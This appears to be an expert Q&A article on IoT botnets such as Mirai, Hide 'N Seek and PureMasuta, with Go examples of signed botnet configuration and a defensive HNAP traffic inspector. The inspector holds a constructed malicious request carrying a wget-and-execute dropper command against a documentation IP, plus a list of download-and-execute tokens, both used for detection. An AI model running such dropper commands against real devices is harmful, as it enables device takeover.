Another round of botnets has been plaguing IoT devices, including Hide 'N Seek, Masuta and PureMasuta. How are these IoT botnets different from previous ones, and how are they spreading?
The threat landscape of the internet changed for the worse in 2016 when the source code for the Mirai malware was released publicly. The code logs in to devices such as routers, wireless cameras and digital video recorders using factory default or hard-coded usernames and passwords. Although those behind Mirai have since been charged, the availability of its source code let other attackers build IoT botnets of their own. These zombie networks have launched distributed denial-of-service (DDoS) attacks of unprecedented size: Mirai's operators used a botnet of around 300,000 compromised IoT devices to flood victims with traffic, and on Sept. 20, 2016, the Krebs on Security website was hit with roughly 620 Gbps of Mirai-generated traffic. Recent discoveries show that attackers are developing new ways to grow and control IoT botnets.
For example, security researchers at Bitdefender discovered the Hide 'N Seek (HNS) botnet compromising Korean-manufactured IP cameras around the world. Working from a randomly generated, updatable list of IP addresses, the bot attempts to log in to any host whose login banner reads "buildroot login", first with a short list of predefined credentials and then, if those fail, with a dictionary attack. Once logged in, the bot picks the compromise method best suited to the type of device and talks to the rest of the botnet over a custom, decentralized peer-to-peer protocol. To defeat infiltration and poisoning attempts, the file used to authenticate commands, which also updates the memory zone where the configuration settings are stored, is signed with an elliptic curve key; a peer that cannot produce a valid signature therefore cannot push a modified configuration or peer list into the network. On top of these antitampering techniques, the bot has data exfiltration and code execution capabilities.
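The signed-configuration mechanism is the interesting defensive trick here, so the following Go program, written for this page and not taken from the HNS sample or Bitdefender's analysis, shows what it buys the operator. It assumes ECDSA over P-256 with a SHA-256 digest (the page only says "elliptic curve key"; the actual curve and encoding of the bot are not stated) and uses a made-up configuration blob. A genuine update verifies, a peer that rewrites the payload but reuses the signature is rejected, and a peer that signs its own payload with a key it generated is also rejected, because only the operator's public key is trusted.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"fmt"
)

// ConfigUpdate is a hypothetical stand-in for the configuration blob a node
// receives over the peer-to-peer network (peer list, scan ranges, credentials).
// The real HNS on-the-wire format is not documented on this page.
type ConfigUpdate struct {
	Payload   []byte // serialized configuration
	Signature []byte // ASN.1 DER ECDSA signature over SHA-256(Payload)
}

// signConfig is the operator side: only the holder of the private key can
// produce an update that nodes will accept.
func signConfig(priv *ecdsa.PrivateKey, payload []byte) (ConfigUpdate, error) {
	digest := sha256.Sum256(payload)
	sig, err := ecdsa.SignASN1(rand.Reader, priv, digest[:])
	if err != nil {
		return ConfigUpdate{}, err
	}
	return ConfigUpdate{Payload: payload, Signature: sig}, nil
}

// verifyConfig is the node side: the operator's public key is baked into the
// binary, and an update whose signature does not verify under it is dropped
// before it can touch the configuration memory zone.
func verifyConfig(pub *ecdsa.PublicKey, upd ConfigUpdate) bool {
	digest := sha256.Sum256(upd.Payload)
	return ecdsa.VerifyASN1(pub, digest[:], upd.Signature)
}

// demo runs the three cases and returns whether each update was accepted:
// a genuine update, a tampered payload with the original signature, and a
// payload signed by an impostor's key.
func demo() (genuine, tampered, impostor bool, err error) {
	operator, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return
	}
	// Constructed sample configuration; addresses are RFC 5737 documentation ranges.
	upd, err := signConfig(operator, []byte("peers=198.51.100.7:9000;scan=10.0.0.0/8"))
	if err != nil {
		return
	}
	genuine = verifyConfig(&operator.PublicKey, upd)

	// Poisoning attempt: a rogue peer swaps in its own peer list but keeps the signature.
	poisoned := upd
	poisoned.Payload = []byte("peers=203.0.113.9:9000;scan=10.0.0.0/8")
	tampered = verifyConfig(&operator.PublicKey, poisoned)

	// Impostor: the rogue peer signs the poisoned payload with a key it generated itself.
	rogue, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return
	}
	forged, err := signConfig(rogue, poisoned.Payload)
	if err != nil {
		return
	}
	impostor = verifyConfig(&operator.PublicKey, forged)
	return
}

func main() {
	genuine, tampered, impostor, err := demo()
	if err != nil {
		panic(err)
	}
	fmt.Printf("genuine accepted: %v\ntampered accepted: %v\nimpostor accepted: %v\n",
		genuine, tampered, impostor)
}
```

The practical consequence for defenders is that sinkholing or poisoning a botnet built this way requires the operator's private key; a researcher who joins the peer-to-peer network can observe traffic but cannot redirect the nodes by feeding them a forged configuration.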
HNS shares its decentralized peer-to-peer architecture with the Hajime IoT botnet. The Masuta and PureMasuta variants, next-generation versions of Mirai discovered by researchers at NewSky Security, are a different lineage and may have been built by the creators of the Satori botnet. Both variants get into IoT devices the way Mirai does, with known or default credentials that are weak; PureMasuta, however, also exploits buffer overflow vulnerabilities in the web administration interface of D-Link's Home Network Administration Protocol (HNAP), which is used to manage the device's configuration. A crafted HNAP request bypasses authentication and causes the device to download and run a shell script from the attacker's command and control server. A flaw in a widely used protocol like this increases the number and range of devices a single exploit can compromise, which is exactly what makes it attractive to a botnet builder.
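What a network defender can do with the description above is inspect HNAP traffic for the two traits it names: an over-long field aimed at the parser, and a download-and-execute payload. The Go program below is an added example for this page, not NewSky's analysis or the PureMasuta payload; the two sample requests are constructed here (the malicious one simply pads the SOAPAction header and puts a wget-and-run command in the body), and the length threshold and token lists are heuristics chosen for the example rather than a published signature.

```go
package main

import (
	"bufio"
	"fmt"
	"io"
	"net/http"
	"strings"
)

// Heuristic thresholds for this example only; tune them against real traffic.
const maxSOAPActionLen = 256

var shellMetachars = []string{"`", ";", "|", "$(", "&&"}
var downloadExecTokens = []string{"wget ", "curl ", "tftp ", "/bin/sh", "chmod +x"}

// rawHNAP builds a raw HTTP/1.1 request to the HNAP endpoint with a correct
// Content-Length, so the samples below parse the way a sniffer would see them.
func rawHNAP(soapAction, body string) string {
	return fmt.Sprintf("POST /HNAP1/ HTTP/1.1\r\nHost: 192.168.0.1\r\n"+
		"SOAPAction: %q\r\nContent-Type: text/xml; charset=utf-8\r\n"+
		"Content-Length: %d\r\n\r\n%s", soapAction, len(body), body)
}

const actionURI = "http://purenetworks.com/HNAP1/GetDeviceSettings"

// Constructed samples, not captured traffic. benignSample is an ordinary
// GetDeviceSettings call; maliciousSample pads the header far past any real
// action URI and carries a download-and-execute command in the body.
var benignSample = rawHNAP(actionURI,
	`<soap:Envelope><soap:Body><GetDeviceSettings xmlns="http://purenetworks.com/HNAP1/"/></soap:Body></soap:Envelope>`)

var maliciousSample = rawHNAP(actionURI+strings.Repeat("A", 600),
	`<soap:Envelope><soap:Body><GetDeviceSettings>wget http://192.0.2.10/bot.sh -O /tmp/bot.sh; chmod +x /tmp/bot.sh; /tmp/bot.sh</GetDeviceSettings></soap:Body></soap:Envelope>`)

// inspectHNAP parses one raw request and returns a short code for each
// suspicious trait found; an empty result means nothing was flagged.
func inspectHNAP(raw string) ([]string, error) {
	req, err := http.ReadRequest(bufio.NewReader(strings.NewReader(raw)))
	if err != nil {
		return nil, err
	}
	if !strings.HasPrefix(req.URL.Path, "/HNAP1") {
		return nil, nil // not an HNAP request; out of scope for this check
	}
	bodyBytes, err := io.ReadAll(req.Body)
	if err != nil {
		return nil, err
	}
	action := req.Header.Get("SOAPAction")
	body := strings.ToLower(string(bodyBytes))

	var findings []string
	// A legitimate action is a short constant URI; a header many times longer
	// than that is the shape of an overflow attempt against the device's parser.
	if len(action) > maxSOAPActionLen {
		findings = append(findings, "oversized-soapaction")
	}
	// Shell metacharacters have no business inside an action URI.
	for _, m := range shellMetachars {
		if strings.Contains(action, m) {
			findings = append(findings, "shell-metachar-in-soapaction")
			break
		}
	}
	// Download-and-execute strings in the body or header point at a dropper
	// fetching its stage-two script from a command and control server.
	for _, tok := range downloadExecTokens {
		if strings.Contains(body, tok) || strings.Contains(strings.ToLower(action), tok) {
			findings = append(findings, "download-and-execute")
			break
		}
	}
	return findings, nil
}

func main() {
	for name, raw := range map[string]string{"benign": benignSample, "malicious": maliciousSample} {
		findings, err := inspectHNAP(raw)
		if err != nil {
			panic(err)
		}
		fmt.Printf("%s: %v\n", name, findings)
	}
}
```

In practice the same checks belong in an IDS rule or a reverse proxy in front of the device's management interface; the point of keeping them narrow (path, one header, a handful of tokens) is that legitimate HNAP clients never trip them, so an alert is worth acting on.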
Like other IoT botnets of this kind, these bots run only in memory and do not achieve persistence: a reboot of a compromised device returns it to a clean state. Until then, however, the device is under the attacker's control, and a rebooted device that still answers to its default credentials will simply be reinfected the next time a bot scans it. Although the new WPA3 standard helps protect Wi-Fi networks whose passphrase is weak by making brute force and dictionary attacks on the handshake impractical, it does nothing for the device's own login interface: any device that still uses its factory default password will remain vulnerable to these bots.
Ask the expert:
Want to ask Michael Cobb a question about application security? Submit your questions now via email. (All questions are anonymous.)